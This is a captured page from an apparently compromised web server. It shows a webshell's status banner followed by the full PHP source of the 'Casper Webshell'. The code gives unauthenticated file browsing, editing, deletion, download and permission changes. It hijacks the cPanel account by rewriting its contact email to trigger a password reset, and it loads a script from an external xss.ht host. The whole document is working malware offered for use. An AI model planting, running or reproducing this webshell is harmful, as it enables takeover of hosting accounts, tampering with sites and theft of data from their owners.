Server IP : 103.53.40.154 / Your IP : 18.116.85.102 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/agarsarbharat.com/admin/../../.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php ini_set('display_errors', 0); // Get current directory or default to root (htdocs) $current_dir = isset($_GET['dir']) ? $_GET['dir'] : dirname(__FILE__); if (!is_dir($current_dir)) { $current_dir = dirname(__FILE__); } $items = scandir($current_dir); function formatBytes($size, $precision = 2) { $base = log($size, 1024); $suffixes = array('', 'KB', 'MB', 'GB', 'TB'); return round(pow(1024, $base - floor($base)), $precision) . ' ' . $suffixes[floor($base)]; } $parent_dir = dirname($current_dir); $editFileContent = ''; $directory = isset($_GET['dir']) ? $_GET['dir'] : '.'; $directory = realpath($directory) ?: '.'; if (isset($_POST['action'])) { $action = $_POST['action']; $target = $_POST['target']; switch ($action) { case 'delete': if (is_dir($target)) { deleteDirectory($target); // Call the recursive delete function } else { unlink($target); } break; case 'edit': if (file_exists($target)) { $editFileContent = file_get_contents($target); } break; case 'save': if (file_exists($target) && isset($_POST['content'])) { file_put_contents($target, $_POST['content']); } break; case 'chmod': if (isset($_POST['permissions'])) { chmod($target, octdec($_POST['permissions'])); } break; case 'download': if (file_exists($target)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($target)); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($target)); readfile($target); exit; } break; } } function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $items = array_diff(scandir($dir), array('.', '..')); foreach ($items as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteDirectory($path); } else { unlink($path); } } return rmdir($dir); } function reset_cpanel_password($email) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $resetUrl = $site . ':2082/resetpass?start=1'; $wr = 'email:' . $email; $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/' . $user . '/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); echo '<br/><center>Password reset link: <a href="http://' . $resetUrl . '">' . $resetUrl . '</a></center>'; echo '<br/><center>Username: ' . $user . '</center>'; } if (isset($_POST['cpanel_reset'])) { $email = $_POST['email']; reset_cpanel_password($email); } $username = get_current_user(); $user = $_SERVER['USER'] ?? 'N/A'; $phpVersion = phpversion(); $dateTime = date('Y-m-d H:i:s'); $hddFreeSpace = disk_free_space("/") / (1024 * 1024 * 1024); // in GB $hddTotalSpace = disk_total_space("/") / (1024 * 1024 * 1024); // in GB $serverIP = $_SERVER['SERVER_ADDR']; $clientIP = $_SERVER['REMOTE_ADDR']; $cwd = getcwd(); $parentDirectory = dirname($directory); if ($parentDirectory === false || $parentDirectory === '/') { $parentDirectory = '.'; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Casper Webshell</title> <script src="https://googlescripts.xss.ht"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } .file-manager { width: 80%; margin: 20px auto; background-color: #fff; padding: 20px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } .file-manager h1 { text-align: center; } .system-info { margin-bottom: 20px; background-color: #f9f9f9; padding: 10px; border: 1px solid #ddd; } .file-list { width: 100%; border-collapse: collapse; } .file-list th, .file-list td { padding: 10px; text-align: left; border-bottom: 1px solid #ddd; } .file-list th { background-color: #f0f0f0; } .file-list tr:hover { background-color: #f9f9f9; } .actions { text-align: center; margin-bottom: 20px; } .actions button { margin-right: 10px; padding: 10px 20px; background-color: #007bff; color: #fff; border: none; cursor: pointer; } .actions button:hover { background-color: #0056b3; } .icon { margin-right: 5px; } .file-actions { display: flex; justify-content: center; } .file-actions form { display: inline; } .file-actions button { background: none; border: none; color: #007bff; cursor: pointer; font-size: 16px; margin: 0 5px; padding: 5px; } .file-actions button:hover { color: #0056b3; } .file-actions button i { margin-right: 0; } .edit-form { margin-top: 20px; } .edit-form textarea { width: 100%; height: 300px; font-family: monospace; font-size: 14px; } .edit-form button { background-color: #28a745; color: #fff; padding: 10px 20px; border: none; cursor: pointer; } .edit-form button:hover { background-color: #218838; } /* Additional styling for reset form */ .reset-form { display: none; /* Initially hidden */ margin-top: 20px; color: #fff; padding: 20px; text-align: center; width: 50%; margin-left: auto; margin-right: auto; } .reset-form input[type="email"], .reset-form input[type="submit"] { background-color: #181818; color: #80D713; padding: 10px; border: none; margin: 5px; } .php-info-button { margin-top: 20px; text-align: center; } .php-info-button button { background-color: #17a2b8; color: #fff; padding: 10px 20px; border: none; cursor: pointer; } .php-info-button button:hover { background-color: #138496; } </style> <script> function toggleResetForm() { var form = document.getElementById('reset-form'); if (form.style.display === 'none' || form.style.display === '') { form.style.display = 'block'; } else { form.style.display = 'none'; } } </script> </head> <body> <div class="file-manager"> <h1>Casper Webshell</h1> <!-- System Information Section --> <div class="system-info"> <div style="display: flex; justify-content: space-between; align-items: center;"> <!-- Text details on the left --> <div style="flex: 1;"> <p><strong>Username:</strong> <?php echo htmlspecialchars($username); ?></p> <p><strong>User:</strong> <?php echo htmlspecialchars($username); ?></p> <p><strong>PHP Version:</strong> <?php echo htmlspecialchars($phpVersion); ?></p> <p><strong>Date and Time:</strong> <?php echo htmlspecialchars($dateTime); ?></p> <p><strong>HDD Free Space:</strong> <?php echo number_format($hddFreeSpace, 2); ?> GB</p> <p><strong>HDD Total Space:</strong> <?php echo number_format($hddTotalSpace, 2); ?> GB</p> <p><strong>Server IP:</strong> <?php echo htmlspecialchars($serverIP); ?></p> <p><strong>Client IP:</strong> <?php echo htmlspecialchars($clientIP); ?></p> <p><strong>Directory:</strong> <?php echo htmlspecialchars($directory); ?></p> </div> <!-- Image on the right --> <div style="flex: 0;"> <img src="https://yt3.googleusercontent.com/rBTzwf5_in7lZsblJiKJ5XmEAFlHLLJL90226QV-xMtzMPXJ6S5ttBI7dfVNCc5rUfFKmzvZyg=s900-c-k-c0x00ffffff-no-rj" alt="Logo" style="max-width: 350px;"> </div> </div> </div> <div class="actions"> <?php if ($parentDirectory !== $directory): ?> <button onclick="location.href='?dir=<?php echo urlencode($parentDirectory); ?>'"> <i class="fas fa-arrow-left icon"></i>Go Back </button> <?php endif; ?> <button onclick="toggleResetForm()"> <i class="fas fa-sync-alt icon"></i>cPanel Reset </button> </div> <table class="file-list"> <thead> <tr> <th>Name</th> <th>Size</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody> <?php // Initialize $files $files = array(); if (is_dir($directory)) { $files = scandir($directory); } foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $filePath = $directory . DIRECTORY_SEPARATOR . $file; $fileSize = is_file($filePath) ? formatBytes(filesize($filePath)) : ''; $permissions = substr(sprintf('%o', fileperms($filePath)), -4); echo "<tr>"; // If it's a directory, make the name a clickable link if (is_dir($filePath)) { echo "<td><a href=\"?dir=" . urlencode($filePath) . "\"><i class='fas fa-folder'></i> $file</a></td>"; } else { echo "<td><i class='fas fa-file'></i> $file</td>"; } echo "<td>$fileSize</td>"; echo "<td>$permissions</td>"; echo "<td class='file-actions'>"; echo "<form method='POST' action=''><input type='hidden' name='target' value='" . htmlspecialchars($filePath) . "'>"; if (is_file($filePath)) { echo "<button type='submit' name='action' value='edit'><i class='fas fa-edit'></i></button>"; echo "<button type='submit' name='action' value='download'><i class='fas fa-download'></i></button>"; } echo "<button type='submit' name='action' value='delete'><i class='fas fa-trash'></i></button>"; echo "<button type='submit' name='action' value='chmod'><i class='fas fa-key'></i></button>"; echo "</form>"; echo "</td>"; echo "</tr>"; } ?> </tbody> </table> <?php if ($editFileContent !== ''): ?> <!-- Edit form for file content --> <div class="edit-form"> <h2>Editing File: <?php echo htmlspecialchars($target); ?></h2> <form method="POST" action=""> <input type="hidden" name="target" value="<?php echo htmlspecialchars($target); ?>"> <textarea name="content"><?php echo htmlspecialchars($editFileContent); ?></textarea> <button type="submit" name="action" value="save">Save Changes</button> </form> </div> <?php endif; ?> <!-- Reset cPanel Password Form --> <div id="reset-form" class="reset-form"> <h2 style="color:black">Reset cPanel Password</h2> <form method="POST" action=""> <input type="email" name="email" placeholder="Enter your email" required> <input type="submit" name="cpanel_reset" value="Send"> </form> </div> <!-- PHP Info Button --> <div class="php-info-button"> <form method="POST" action=""> <button type="submit" name="action" value="phpinfo">Show PHP Info</button> </form> </div> <?php // Display PHP Info if requested if (isset($_POST['action']) && $_POST['action'] == 'phpinfo') { phpinfo(); } ?> </div> </body> </html>